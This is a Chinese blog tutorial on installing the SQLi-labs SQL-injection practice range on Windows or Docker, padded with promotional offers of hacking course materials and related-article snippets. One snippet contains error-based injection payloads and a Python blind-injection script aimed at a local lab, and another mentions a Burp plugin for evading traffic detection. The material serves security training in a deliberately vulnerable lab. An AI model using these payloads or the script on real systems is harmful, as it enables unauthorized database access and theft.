SQL 注入之 WindowsDocker 环境 SQLi-labs 靶场搭建!_sqli-labs docker

最新推荐文章于 2025-06-21 11:31:57 发布
最新推荐文章于 2025-06-21 11:31:57 发布
阅读量866 收藏 25
点赞数 20
CC 4.0 BY-SA版权
分类专栏: 网络安全 程序员 编程 文章标签: sql docker 数据库 网络 开发语言 php 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/A1_3_9_7/article/details/145479607

在安全测试领域,SQL注入是一种常见的攻击方式,通过应用程序的输入执行恶意SQL查询,从而绕过认证和授权,可以窃取、篡改或破坏数据库中的数据。作为安全测试学习者,如果你要练习SQL注入,在未授权情况下直接去攻击一个网站是违法的,安全测试靶场则提供了一个安全实验环境,可以放心地进行攻防实战操作,提升自己的技能。本文就给大家详细讲解如何在windows、docker环境下搭建sqli-labs靶场!

一、SQLi-labs简介

SQLi-labs是由印度程序员开发,专门用于练习SQL注入的靶场,其中包含各种注入姿势,并适用于GET和POST等场景。主要包含:基础错误注入、报错注入、盲注、MySQL读写文件、更新查询注入、插入查询注入、Header头部注入、二次注入、绕过WAF、绕过addslashes函数、绕过mysql_real_escape_string函数、堆叠注入。

二、Windows搭建SQLi-labs靶场

1、基于PHPStudy进行靶场搭建,关于PHPStudy下载及安装,看我之前写过的文章 http://testingpai.com/article/1708419594887

2、下载SQLi-labs,源码下载链接:https://github.com/Audi-1/sqli-labs.git

3、下载后解压对应文件,并放入phpstudy安装目录的WWW目录下

4、打开浏览器,输入“http://windows服务器ip/sqli-labs-master/” ,可以看到如下的界面,点击“Setup/reset Database for labs”,会出现Access denied的提示。这里我们要先配置下数据库文件。

5、打开sqli-labs-master\sql-connections\db-creds.inc,配置dbuser、dbpass为phpstudy中数据库的用户名和密码信息,修改后保存保存文件。

6、再去刷新刚报错界面,出现如下图片,则表示搭建成功。

三、Docker快速搭建SQLi-labs靶场

1、请先确保已经安装好了Docker。Docker可以快速实现搭建,不需手动配置;且安全测试靶场环境相互独立。是安全测试学习者非常青睐的一种部署方式。

2、执行:docker search sqli-labs。从docker hub上搜索sqli-labs,选择一个STARS最高的来下载。

3、执行:docker pull acgpiano/sqli-labs , 从docker hub拉取对应sqli-labs镜像。

3、执行:docker run -dt --name sqli-labs -p 81:80 --rm acgpiano/sqli-labs, 将镜像运行为容器

  • -d 表示后台运行,返回容器id

  • -t 为容器重新分配一个伪输入终端,通常与 -i 同时使用

  • –name sqli-labs 将容器命名为sqli-labs

  • -p 81:80 映射外部访问端口

  • –rm 是指当其关闭后删除开启的资源

  • acgpiano/sqli-labs 镜像名

4、浏览器输入:docker所在服务器ip:81, 出现如下界面

5、点击Setup/reset Databse for labs,创建数据库成功则表示靶场部署成功。接下来即可开始SQL注入练习。

题外话

黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

1.学习路线图

在这里插入图片描述

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。

在这里插入图片描述

(都打包成一块的了,不能一一展开,总共300多集)

因篇幅有限,仅展示部分资料,需要见下图即可前往获取
在这里插入图片描述

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要见下图即可前往获取
在这里插入图片描述

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包,需要的话见下图即可前往获取
在这里插入图片描述

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要见下图即可前往获取
在这里插入图片描述

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
————————————————

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

SQL 注入之 Windows/Docker 环境 SQLi-labs 靶场搭建
朱雀随云记的博客
04-07 2132
4、打开浏览器,输入“http://windows服务器ip/sqli-labs-master/” ,可以看到如下的界面,点击“Setup/reset Database for labs”,会出现Access denied的提示。3、执行:docker run -dt --name sqli-labs -p 81:80 --rm acgpiano/sqli-labs, 将镜像运行为容器。--name sqli-labs 将容器命名为sqli-labs。acgpiano/sqli-labs 镜像名。
docker搭建sqli-labs靶场
songling515010475的专栏
08-19 775
1、启动docker [root@localhost ~]# service docker start Redirecting to /bin/systemctl start docker.service 2、搜索sqli-labs镜像 [root@localhost ~]# docker search sqli-labs NAME DESCRIPTION STARS OF
WmiTools(windows系统工具)
01-20
Wmi Tools不仅是一个查询软件,还可以创建wmi实例,执行wql(类似于sql一样的wmi查询语句)。不过我们用的最多的还是它的查询功能,查询一些我们需要的属性和方法名。
Burpsuite 指纹特征绕过
Javachichi的博客
12-05 3810
需要高版本 17 + 的 burp 运行插件,可 bypass 网站流量设备的检测,正常抓包。未使用插件前,burp 指纹特征被识别,抓包被拦截。
SQL注入:别再纸上谈兵(非常详细)从零基础入门到精通,收藏这篇就够了
最新发布
Javachichi的博客
06-21 1032
SQL注入,安全圈里谁敢说没听过?CTF比赛的常客,渗透测试的噩梦,说是Web安全的入门级Boss,绝对不为过。想在网络安全界混,不懂SQL注入?趁早回家种地吧!今天就来聊聊SQLi-Labs,一个让无数安全小白闻风丧胆,又让无数安全大神乐此不疲的SQL注入“修炼圣地”。
RESTful API 设计指南
任我行的博客
09-18 395
一、协议 API与用户的通信协议,总是使用HTTPs协议。 二、域名 应该尽量将API部署在专用域名之下。 https://api.example.com 如果确定API很简单,不会有进一步扩展,可以考虑放在主域名下。 https://example.org/api/ 三、版本(Versioning) 应该将API的版本号放入URL。 https://api.example.com/v1/ 另一种做法是,将版本号放在HTTP头信息中,但不如放入URL方便和直观。Github采用这种做法。 四、路径(Endp
转载:阮一峰 RESTful API设计指南
diaojian0245的博客
09-09 401
阮一峰先生的文章对我理解启发很大,转载到我的博客 http://www.ruanyifeng.com/blog/2014/05/restful_api.html 网络应用程序,分为前端和后端两个部分。当前的发展趋势,就是前端设备层出不穷(手机、平板、桌面电脑、其他专用设备......)。 因此,必须有一种统一的机制,方便不同的前端设备与后端进行通信。这导致API构架的流行,甚至出现"AP...
软件测试的岗位会越来越少?测试做到头来,就只能去送外卖?
zjtdy的博客
05-14 725
软件测试的岗位不会越来越少,但要求却会越来越高。 接下来以理服人。 一、为什么测试岗位不会越来越少? 1、谈谈测试对企业的价值,看测试岗位为什么不会少 作为软件企业而言,其核心就是提高软件的质量,以便高品质的产品能快速占领市场。但如果产品的质量都无法保证,那企业就会失去用户的支持,无法正常发展。而测试人员,作为产品质量的守护者,会用专业手段,找到程序中存在的问题,让程序员进行修改,以确保产品能够满足用户的需求。所以测试人员和生产软件的开发人员是同等重要的。是不是这样,我们来讲个2019年才发生的故事。 2.
使用Docker搭建SQLi-Labs平台
YOU
04-09 8453
使用Docker搭建SQLi-Labs平台 关于dockersql注入使用Docker搭建SQLi-Labs平台一.关于Docker二.Docker的安装三.关于SQLi-Labs四.搭建SQLi-Labs五.进入Docker更改内容 一.关于Docker Docker 是基于 linux 内核的 cgroup 和 namespace 等实现的进程隔离技术,是操作系统层面的虚拟化技术。由于进程在宿主机上被分割成独立的空间,就像一个独立的容器将这些进程与外界隔离开来,因此被称为容器。 标准化的解决方案,软件
centos7.6安装docker搭建sqli-labs靶场
weixin_50644728的博客
10-14 784
Docker & VMware 1.Docker :是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的Linux机器上,也可以实现虚拟化,容器是完全使用沙箱机制,相互之间不会有任何接口。(摘自百度百科) 2.与vmware的区别: VMware是在宿主机器操作系统的基础上创建的从操作系统。需要几个相互隔离的应用,就需要启动几个虚拟机,会消耗大量CPU和内存。 docker在宿主机的操作系统上创建docker引擎,直接在宿主机操作系统上调用硬件资源
使用docker搭建sqli-labs
Alashan12的博客
04-07 4149
与前面搭建upload-labs类似 su root 切换root用户(docker的使用需要在root下) dockder search sqli-labsdocker镜像仓库(公有仓库)搜索sqli-labs镜像 docker pull acgpinao/sqli-labs 从公有仓库拉取下载sqli-labs镜像(拉取哪个都可以) docker images 查看本地私有仓库的镜像 如图sqli-labs镜像下载成功 docker run -d -p 81:...
TOMCAT 中间件安全加固
单核CPU的小朋友的博客
04-28 2096
TOMCAT 中间件安全加固 1、 tomcat中间件安装: yum install httpd* -y yum install tomcat* -y 然后就能看到系统中多出了个端口: 其中8005端口是管理口,8080是默认的tomcat页面 我们可以通过访问本地8080口来判断服务是否安装成功 其中下文会详细介绍如何更改tomcat的管理口和页面显示端口。 其中, Tomcat配置文件...
软件测试的岗位会越来越少吗?
m0_57290404的博客
01-07 570
软件测试的岗位不会越来越少,但要求却会越来越高。 接下来我将来论证我的观点。 一、为什么测试岗位不会越来越少? 1、谈谈测试对企业的价值,看测试岗位为什么不会少作为软件企业而言,其核心就是提高软件的质量,以便高品质的产品能快速占领市场。但如果产品的质量都无法保证,那企业就会失去用户的支持,无法正常发展。而测试人员,作为产品质量的守护者,会用专业手段,找到程序中存在的问题,让程序员进行修改,以确保产品能够满足用户的需求。 所以测试人员和生产软件的开发人员是同等重要的。是不是这样,我们来讲个2019年才发生的故
Restful API设计指南
Fly_鹏程万里
03-18 615
理解RESTful架构 越来越多的人开始意识到,网站即软件,而且是一种新型的软件。 这种"互联网软件"采用客户端/服务器模式,建立在分布式体系上,通过互联网通信,具有高延时(high latency)、高并发等特点。 网站开发,完全可以采用软件开发的模式。但是传统上,软件和网络是两个不同的领域,很少有交集;软件开发主要针对单机环境网络则主要研究系统之间的通信。互联网的兴起,使得这两个领域开...
RESTful API 接口设计指南
流华追梦的专栏
11-30 2689
网络应用程序,分为前端和后端两个部分。当前的发展趋势,就是前端设备层出不穷(手机、平板、桌面电脑、其他终端设备等)。因此,必须有一种统一的机制,方便不同的前端设备与后端进行通信。这导致API构架的流行,甚至出现“API First”的设计思想。RESTful API 是目前比较成熟的一套互联网应用程序的 API 设计理论。
WMI工具
weixin_30872789的博客
03-11 347
WMI 测试器 (wbemtest.exe) WMI 命令行工具 (wmic.exe) wmic:root\cli>process /? PROCESS - 进程管理。 提示: BNF 的别名用法。 (<alias> [WMIObject] | <alias> [<path where>] | [<alias>] &...
软件测试岗位会越来越少吗?
weixin_46635091的博客
04-13 1159
先说结论:软件测试的岗位不会越来越少,但是要求会越来越高。 说个比较现实一定的结论:岗位少不可怕,要求越来越高也不可怕,可怕的是,软件测试行业已经发生巨变,而你却原地踏步! 裁员不可怕,可怕的是行业在发生巨变,而你却原地踏步 软件测试行业已经发生很大变化,你跟上变化了吗? 很多刚刚进入这个行业的同学,无论是应届毕业生还是培训班转行,发现出来以后简历投出去就是石沉大海,而在16/17年,一个手工测试...
SQLI-LABS报错注入
04-02
### SQLI-LABS 报错注入解决方案教程 #### 背景介绍 SQL 注入是一种常见的安全漏洞,攻击者通过输入恶意的 SQL 查询语句来获取敏感信息或破坏数据库。在 `sqli-labs` 靶场中,报错注入是一个重要的学习模块。它利用了某些函数或语法特性,在执行过程中触发错误消息,并从中提取有用的信息。 以下是针对 `sqli-labs` 报错注入的具体方法和技巧: --- #### 使用特定函数触发错误 MySQL 提供了一些内置函数,这些函数可以在查询失败时返回详细的错误信息。常用的有以下几个: - **`extractvalue()`**: 可用于从 XML 数据中提取值。如果指定的节点不存在,则会抛出异常。 - **`updatexml()`**: 类似于 `extractvalue()`,但它主要用于更新 XML 文档中的值。 - **`floor()` 和随机数组合**: 利用浮点运算引发除零错误或其他计算错误。 例如,可以通过以下方式构造查询字符串[^2]: ```sql ?id=1' || extractvalue(1,concat(0x3a,(select database()))) --+ ``` 上述语句的作用是从目标数据库中提取当前使用的数据库名称。 --- #### 结合联合查询与条件判断 为了进一步验证是否存在注入点以及如何绕过过滤器,可以尝试使用布尔盲注的方式逐步缩小范围。比如,假设需要猜测第 i 位字符是否为某个具体字母 a-z 或 A-Z,可采用如下形式[^3]: ```sql ?id=1 AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='security'),i,1))>ascii_value -- ``` 这里的关键在于调整变量 `i` 来定位不同的位置,并比较其对应的 ASCII 值大小关系。 --- #### 自动化工具辅助分析 手动测试虽然有助于理解原理,但在实际场景下效率较低。因此推荐借助一些自动化脚本或者开源项目完成批量探测工作。Burp Suite Pro 版本自带 Intruder 功能非常适合此类任务;另外还有专门设计用来处理 Web 应用程序安全性评估工作的 OWASP ZAP 工具可供选择。 对于初学者来说,也可以编写简单的 Python 脚本来实现基本功能。下面给出一段示范代码片段作为参考[^4]: ```python import requests url = "http://localhost/sqli-labs/Less-5/?id=" payload_template = "' OR (SELECT ASCII(SUBSTR(({query}),{pos},1)))={char}-- " characters = range(32, 127) def get_char(pos): for char in characters: payload = url + payload_template.format(query="database()", pos=pos, char=char) response = requests.get(payload).text if "You are in" in response: return chr(char), True return None, False result = "" for position in range(1, 9): # Assuming DB name length is known to be 8 chars. next_character, success = get_char(position) if not success: break result += str(next_character) print(f"The extracted db name is {result}") ``` 此脚本实现了基于时间延迟反馈机制下的单字节恢复过程演示效果。 --- #### 注意事项 尽管以上技术能够有效帮助学员掌握核心概念,但仍需注意合法合规前提下方能实践演练。切勿非法入侵他人系统! ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安导师小李

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值